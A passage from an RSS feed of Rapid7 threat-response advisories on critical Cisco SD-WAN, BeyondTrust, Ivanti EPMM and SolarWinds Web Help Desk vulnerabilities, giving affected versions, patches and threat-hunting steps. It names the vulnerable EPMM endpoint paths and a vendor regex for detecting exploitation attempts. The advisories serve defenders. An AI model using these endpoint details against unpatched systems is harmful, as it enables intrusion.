href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk"><span style='font-size: undefined;'>refer</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to the official vendor advisory.</span></p><h2><span style='color:rgb(31, 31, 31);'>Artifacts/Evidence Sources and IOCs</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>For any potentially compromised systems, Cisco </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk#Indicators%20of%20Compromise"><span style='font-size: undefined;'>recommends</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> specific detection and forensic analysis steps to identify exploitation of CVE-2026-20127. According to Cisco, defenders should look for control connection peering events in Cisco Catalyst SD-WAN logs; Cisco states that all peering events will require manual validation to confirm if the events are valid or not, using the following steps:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Verify the timestamp of each peering event against known maintenance windows, scheduled configuration changes, and normal operational hours for your environment.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Confirm the public IP address corresponds to infrastructure owned or operated by your organization or authorized partners by cross-referencing against asset inventories and authorized IP ranges.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Validate the peer system IP matches documented device assignments within your Cisco Catalyst SD-WAN topology.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Review the peer type (vmanage, vsmart, vedge, vbond) to ensure it aligns with expected device roles in your deployment.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Correlate multiple events from the same source IP or system IP to identify patterns of reconnaissance or persistent access attempts.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Cross-reference event timing with authentication logs, change management records, and user activity to establish whether the connection was initiated by authorized personnel.</span></p></li></ul><h2><span style='color:rgb(31, 31, 31);'>Rapid7 customers</span></h2><h3><span style='color:rgb(31, 31, 31);'>Exposure Command, InsightVM, and Nexpose</span></h3><p>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-20127 with an authenticated check available in the Feb 26 content release.</p><h2><span style='color:rgb(31, 31, 31);'>Updates</span></h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>February 25, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><p><strong>February 26, 2026:</strong> Updated to reflect product content availability.</p></li><li><span style='font-size: undefined;'><strong>March 19, 2026:</strong></span><span style='font-size: undefined;'> Added a reference to the Rapid7 Analysis. </span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127</link>
      <guid isPermaLink="false">bltef5cf983b62c908d</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Emerging Threats]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Wed, 25 Feb 2026 22:03:33 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-1731: Critical Unauthenticated Remote Code Execution in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On February 6, 2026, BeyondTrust </span><a href="https://www.beyondtrust.com/trust-center/security-advisories/bt26-02"><span style='font-size: undefined;'>released</span></a><span style='font-size: undefined;'> security advisory BT26-02, disclosing a critical pre-authentication Remote Code Execution (RCE) vulnerability affecting its </span><a href="https://www.beyondtrust.com/products/remote-support"><span style='font-size: undefined;'>Remote Support (RS)</span></a><span style='font-size: undefined;'> and </span><a href="https://www.beyondtrust.com/products/privileged-remote-access"><span style='font-size: undefined;'>Privileged Remote Access (PRA)</span></a><span style='font-size: undefined;'> products. Assigned </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1731"><span style='font-size: undefined;'>CVE-2026-1731</span></a><span style='font-size: undefined;'> and a near-maximum CVSSv4 score of 9.9, the flaw allows unauthenticated, remote attackers to execute arbitrary operating system commands in the context of the site user by sending specially crafted requests. The vulnerability affects Remote Support (RS) versions 25.3.1 and prior, as well as Privileged Remote Access (PRA) versions 24.3.4 and prior. </span></p><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While BeyondTrust automatically patched SaaS instances on February 2, 2026, self-hosted customers remain at risk until manual updates are applied. The issue was </span><a href="https://www.hacktron.ai/blog/cve-2026-1731-beyondtrust-remote-support-rce"><span style='font-size: undefined;'>discovered</span></a><span style='font-size: undefined;'> by researchers at Hacktron AI using AI-enabled variant analysis; they identified approximately 8,500 on-premises instances exposed to the internet that could be susceptible to this straightforward exploitation vector. </span></p><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While BeyondTrust has not reported active exploitation of CVE-2026-1731 in the wild, the platform’s immense footprint makes it a high-priority target for sophisticated adversaries. BeyondTrust provides identity security services to more than 20,000 customers across over 100 countries, including 75% of the Fortune 100. This ubiquity has attracted state-sponsored actors in the past; notably, the Chinese hacking group "Silk Typhoon" weaponized previous zero-day flaws (CVE-2024-12356 and CVE-2024-12686) to breach the U.S. Treasury Department and access sensitive data related to sanctions, triggering emergency directives from CISA. Rapid7 research later </span><a href="https://www.rapid7.com/blog/post/2025/02/13/cve-2025-1094-postgresql-psql-sql-injection-fixed/"><span style='font-size: undefined;'>revealed</span></a><span style='font-size: undefined;'> that the exploitation of CVE-2024-12356 actually required chaining it with a critical, then-unknown SQL injection vulnerability in an underlying PostgreSQL tool (CVE-2025-1094). Given this history of targeted attacks against such a widely used platform, these tools remain a critical attack vector that demands immediate defensive action.</span></p><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On February 10, 2026, Rapid7 Labs published a full </span><a href="https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of the vulnerability.</span></p><p><br/><span style='font-size: undefined;'>On February 13, 2026, CVE-2026-1731, was </span><a href="https://www.cisa.gov/news-events/alerts/2026/02/13/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A vendor-provided patch is available to remediate CVE-2026-1731 in on-premise deployments.</span></p><h4><span style='font-size: undefined;'>BeyondTrust Remote Support (RS):</span></h4><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions </span><span style='font-size: undefined;'><span data-type='inlineCode'>25.3.1</span></span><span style='font-size: undefined;'> and prior are affected by CVE-2026-1731.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-1731 is fixed in </span><span style='font-size: undefined;'><span data-type='inlineCode'>25.3.2</span></span><span style='font-size: undefined;'> and later.</span></p></li></ul><h4><span style='font-size: undefined;'>BeyondTrust Privileged Remote Access (PRA):</span></h4><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions </span><span style='font-size: undefined;'><span data-type='inlineCode'>24.3.4</span></span><span style='font-size: undefined;'> and prior are affected by CVE-2026-1731.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-1731 is fixed in </span><span style='font-size: undefined;'><span data-type='inlineCode'>25.1.1</span></span><span style='font-size: undefined;'> and later.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Please read the vendor </span><a href="https://www.beyondtrust.com/trust-center/security-advisories/bt26-02"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the latest guidance.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;">Exposure Command, InsightVM and Nexpose customers can assess exposure to CVE-2026-1731 on Remote Support and Privileged Remote Access using authenticated checks available in the Feb 9 content release.</p><h2 style="direction: ltr;">Updates</h2><ul><li><span style='font-size: undefined;'><strong>February 11, 2026:</strong></span><span style='font-size: undefined;'> Updated Rapid7 customers section to confirm checks were available on February 9.</span></li><li><p><strong>February 16, 2026:</strong> Updated the Overview to add a reference to the technical analysis and to note that CVE-2026-1731 was added to the CISA KEV list.</p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra</link>
      <guid isPermaLink="false">blt276e2cd183c48ea0</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 09 Feb 2026 19:15:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical Ivanti Endpoint Manager Mobile (EPMM) zero-day exploited in the wild (CVE-2026-1281 & CVE-2026-1340)]]></title>
      <description><![CDATA[<h2>Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On January 29, 2026, Ivanti </span><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US"><span style='font-size: undefined;'>disclosed</span></a><span style='font-size: undefined;'> two new critical vulnerabilities affecting </span><a href="https://www.ivanti.com/products/endpoint-manager-mobile"><span style='font-size: undefined;'>Endpoint Manager Mobile</span></a><span style='font-size: undefined;'> (EPMM): </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1340"><span style='font-size: undefined;'>CVE-2026-1340</span></a><span style='font-size: undefined;'>. </span><span style='font-size: undefined;'><strong>The vendor has indicated that exploitation in the wild has already occurred prior to disclosure.</strong></span><span style='font-size: undefined;'> This has been echoed by CISA who added </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a><span style='font-size: undefined;'> to their </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>Known Exploited Vulnerabilities</span></a><span style='font-size: undefined;'> (KEV) catalog shortly after the vendor disclosure. As an indication of how critical this development is, CISA has given a “due date” of only 3 days (Due Feb 1, 2026) for organizations, such as federal agencies, to remediate the vulnerabilities before the affected devices must be removed from a network.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a><span style='font-size: undefined;'> has been confirmed as exploited in the wild as a zero day, it is unclear if </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1340"><span style='font-size: undefined;'>CVE-2026-1340</span></a><span style='font-size: undefined;'> has also, or if this vulnerability was found separately to </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a><span style='font-size: undefined;'>. The two critical vulnerabilities are summarized below.</span></p><p>⠀</p><table><colgroup data-width='750'><col style="width:24.462809917355372%"/><col style="width:22.8099173553719%"/><col style="width:52.72727272727272%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CWE</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Improper Control of Generation of Code (</span><a href="https://cwe.mitre.org/data/definitions/94.html"><span style='font-size: undefined;'>CWE-94</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2026-1340"><span style='font-size: undefined;'>CVE-2026-1340</span></a></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Improper Control of Generation of Code (</span><a href="https://cwe.mitre.org/data/definitions/94.html"><span style='font-size: undefined;'>CWE-94</span></a><span style='font-size: undefined;'>)</span></p></td></tr></tbody></table><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>Both </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1340"><span style='font-size: undefined;'>CVE-2026-1340</span></a><span style='font-size: undefined;'> are described identically by the vendor; they are code injection issues, allowing a remote unauthenticated attacker to execute arbitrary code on an affected device. Based on the vendor's </span><a href="https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US"><span style='font-size: undefined;'>guidance</span></a><span style='font-size: undefined;'>, the attackers can provide Bash commands as part of a malicious HTTP GET request to the endpoints that service either the “In-House Application Distribution” feature (i.e. </span><span style='font-size: undefined;'><span data-type='inlineCode'>/mifs/c/appstore/fob/</span></span><span style='font-size: undefined;'>) or the “Android File Transfer Configuration” feature (i.e. </span><span style='font-size: undefined;'><span data-type='inlineCode'>/mifs/c/aftstore/fob/</span></span><span style='font-size: undefined;'>), resulting in arbitrary OS command execution on the target. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As EPMM is an endpoint management solution for mobile devices, the impact of an attacker compromising the EPMM server is significant. An attacker may be able to access Personally Identifiable Information (PII) regarding mobile device users, such as their names and email addresses, but also their mobile device information, such as their phone numbers, GPS information, and other sensitive unique identification information. This is in addition to the privileged position an attacker will have on the EPMM device itself, which may allow for lateral movement within the compromised network.</span><br/><span style='font-size: undefined;'>Given the nature of the product, EPMM is a high-profile target. It has been repeatedly targeted by zero-day vulnerabilities in the past. In 2023 the product was exploited in the wild via </span><a href="https://www.rapid7.com/blog/post/2023/07/26/etr-cve-2023-35078-critical-api-access-vulnerability-ivanti-in-endpoint-manager-mobile/"><span style='font-size: undefined;'>CVE-2023-35078</span></a><span style='font-size: undefined;'>, and again in 2025 via an exploit chain of </span><a href="https://www.rapid7.com/blog/post/2025/05/16/etr-ivanti-epmm-exploit-chain-exploited-in-the-wild/"><span style='font-size: undefined;'>CVE-2025-4427 and CVE-2025-4428</span></a><span style='font-size: undefined;'>. As of January 30, 2026, a public working proof-of-concept exploit for remote code execution is </span><a href="https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/" target="_blank"><span style='font-size: undefined;'>available</span></a><span style='font-size: undefined;'>. Organizations running EPMM are urged to act quickly and follow the vendor guidance to remediate these issues.</span></p><h2>Threat hunting </h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following </span><a href="https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US"><span style='font-size: undefined;'>vendor supplied</span></a><span style='font-size: undefined;'> regular expression can be used to search the HTTP daemon’s log files for evidence of potential exploitation of </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1281"><span style='font-size: undefined;'>CVE-2026-1281</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-1340"><span style='font-size: undefined;'>CVE-2026-1340</span></a><span style='font-size: undefined;'>:</span>⠀</p><pre language="html">^.*\/mifs\/c\/\(aft\|app\)store.*theValue\?\?.*</pre><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A vendor supplied update is available to remediate both vulnerabilities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following affected versions of Ivanti EPMM are remediated via the RPM 12.x.0.x patch:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions 12.7.0.0 and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions 12.6.0.0 and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions 12.5.0.0 and below</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The following affected versions of Ivanti EPMM are remediated via the RPM 12.x.1.x patch:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions 12.6.1.0 and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Versions 12.5.1.0 and below</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Customers are advised to update to the latest remediated version of EPMM, on an emergency basis outside of normal patching cycles, as exploitation in-the-wild is already occurring.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance for Ivanti EPMM, please refer to the vendor’s security </span><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>. In addition to remediation, the vendor has provided additional threat hunting </span><a href="https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US"><span style='font-size: undefined;'>guidance</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-1281 and CVE-2026-1340 with authenticated vulnerability checks expected to be available in today's (Jan 30) content release. Note that the "Potential" category must be enabled in the scan template to run the checks.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><strong>January 30, 2026:</strong> Added reference to the watchTowr technical analysis and proof-of-concept exploit.</li><li style="direction: ltr;"><strong>March 19, 2026:</strong> Updated the regex found in the <strong>Threat hunting </strong>section, based on new information from Ivanti.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-ivanti-endpoint-manager-mobile-epmm-zero-day-exploited-in-the-wild-eitw-cve-2026-1281-1340</link>
      <guid isPermaLink="false">blt31c5cca63927517a</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Fri, 30 Jan 2026 16:14:40 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Multiple Critical SolarWinds Web Help Desk Vulnerabilities: CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554]]></title>
      <description><![CDATA[<h2>Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On January 28, 2026, SolarWinds published an </span><a href="https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for multiple new vulnerabilities affecting their </span><a href="https://www.solarwinds.com/web-help-desk"><span style='font-size: undefined;'>Web Help Desk</span></a><span style='font-size: undefined;'> product. Web Help Desk is an IT help desk ticketing and asset management software solution. Of the six new CVEs disclosed in the advisory, four are critical, and allow a remote attacker to either achieve unauthenticated remote code execution (RCE) or bypass authentication. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of this writing, there is currently no known in-the-wild exploitation occurring. However, we expect this to change as and when technical details become available. Notably, this product has been featured on CISA’s </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>Known Exploited Vulnerabilities</span></a><span style='font-size: undefined;'> (KEV) list twice in the past, circa 2024, indicating that it is a target for real-world attackers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The six vulnerabilities are summarized below.</span></p><table><colgroup data-width='750'><col style="width:24.462809917355372%"/><col style="width:22.8099173553719%"/><col style="width:52.72727272727272%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CWE</strong></span></p></td></tr><tr><td><p></p><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2025-40551"><span style='font-size: undefined;'>CVE-2025-40551</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.8 (Critical)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Deserialization of Untrusted Data (</span><a href="https://cwe.mitre.org/data/definitions/502.html"><span style='font-size: undefined;'>CWE-502</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p></p><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2025-40552"><span style='font-size: undefined;'>CVE-2025-40552</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.8 (Critical)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Weak Authentication (</span><a href="https://cwe.mitre.org/data/definitions/1390.html"><span style='font-size: undefined;'>CWE-1390</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p></p><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2025-40553"><span style='font-size: undefined;'>CVE-2025-40553</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.8 (Critical)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Deserialization of Untrusted Data (</span><a href="https://cwe.mitre.org/data/definitions/502.html"><span style='font-size: undefined;'>CWE-502</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p></p><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2025-40554"><span style='font-size: undefined;'>CVE-2025-40554</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.8 (Critical)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Weak Authentication (</span><a href="https://cwe.mitre.org/data/definitions/1390.html"><span style='font-size: undefined;'>CWE-1390</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2025-40536"><span style='font-size: undefined;'>CVE-2025-40536</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>8.1 (High)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Protection Mechanism Failure (</span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40536#:~:text=CWE%2D693%20Protection%20Mechanism%20Failure"><span style='font-size: undefined;'>CWE-693</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2025-40537"><span style='font-size: undefined;'>CVE-2025-40537</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.5 (High)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Use of Hard-coded Credentials (</span><a href="https://cwe.mitre.org/data/definitions/798.html"><span style='font-size: undefined;'>CWE-798</span></a><span style='font-size: undefined;'>)</span></p></td></tr></tbody></table><p><span style='font-size: undefined;'><em>Update #1:</em></span><span style='font-size: undefined;'> On February 3, 2026, the unsafe deserialization vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40551"><span style='font-size: undefined;'>CVE-2025-40551</span></a><span style='font-size: undefined;'>, was </span><a href="https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation.</span></p><p><span style='font-size: undefined;'><em>Update #2:</em></span><span style='font-size: undefined;'> On February 12, 2026, the access control bypass vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40536"><span style='font-size: undefined;'>CVE-2025-40536</span></a><span style='font-size: undefined;'>, was </span><a href="https://www.cisa.gov/news-events/alerts/2026/02/12/cisa-adds-four-known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation.</span></p><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Both </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40551"><span style='font-size: undefined;'>CVE-2025-40551</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40553"><span style='font-size: undefined;'>CVE-2025-40553</span></a><span style='font-size: undefined;'> are critical deserialization of untrusted data vulnerabilities that allow a remote unauthenticated attacker to achieve RCE on a target system and execute payloads such as arbitrary OS command execution. RCE via deserialization is a highly reliable vector for attackers to leverage, and as these vulnerabilities are exploitable without authentication, the impact of either of these two vulnerabilities is significant.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The other two critical vulnerabilities, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40552"><span style='font-size: undefined;'>CVE-2025-40552</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40554"><span style='font-size: undefined;'>CVE-2025-40554</span></a><span style='font-size: undefined;'>, are authentication bypasses that allow a remote unauthenticated attacker to execute actions or methods on a target system which are intended to be gated by authentication. Based upon the vendor supplied CVSS scores for these two authentication bypass vulnerabilities, the impact is equivalent to the two RCE deserialization vulnerabilities, likely meaning they can also be leveraged for RCE.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to the four critical vulnerabilities, two high severity vulnerabilities were also disclosed. </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40536"><span style='font-size: undefined;'>CVE-2025-40536</span></a><span style='font-size: undefined;'> is an access control bypass vulnerability, allowing an attacker to access functionality on the target system that is intended to be restricted to authenticated users. Separately, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40537"><span style='font-size: undefined;'>CVE-2025-40537</span></a><span style='font-size: undefined;'> may, under certain conditions, allow access to some administrative functionality on the target system due to the existence of hardcoded credentials. </span></p><p><span style='font-size: undefined;'>A </span><a href="https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/"><span style='font-size: undefined;'>full technical analysis</span></a><span style='font-size: undefined;'> of </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40551"><span style='font-size: undefined;'>CVE-2025-40551</span></a><span style='font-size: undefined;'>, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40536"><span style='font-size: undefined;'>CVE-2025-40536</span></a><span style='font-size: undefined;'>, and </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40537"><span style='font-size: undefined;'>CVE-2025-40537</span></a><span style='font-size: undefined;'> has been published by the original finders, Horizon3.ai.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A vendor supplied update is available to remediate all six vulnerabilities: </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40551"><span style='font-size: undefined;'>CVE-2025-40551</span></a><span style='font-size: undefined;'>, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40552"><span style='font-size: undefined;'>CVE-2025-40552</span></a><span style='font-size: undefined;'>, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40553"><span style='font-size: undefined;'>CVE-2025-40553</span></a><span style='font-size: undefined;'>, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40554"><span style='font-size: undefined;'>CVE-2025-40554</span></a><span style='font-size: undefined;'>, </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40536"><span style='font-size: undefined;'>CVE-2025-40536</span></a><span style='font-size: undefined;'>, and </span><a href="https://www.cve.org/CVERecord?id=CVE-2025-40537"><span style='font-size: undefined;'>CVE-2025-40537</span></a><span style='font-size: undefined;'>. The following product versions are affected:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>SolarWinds Web Help Desk 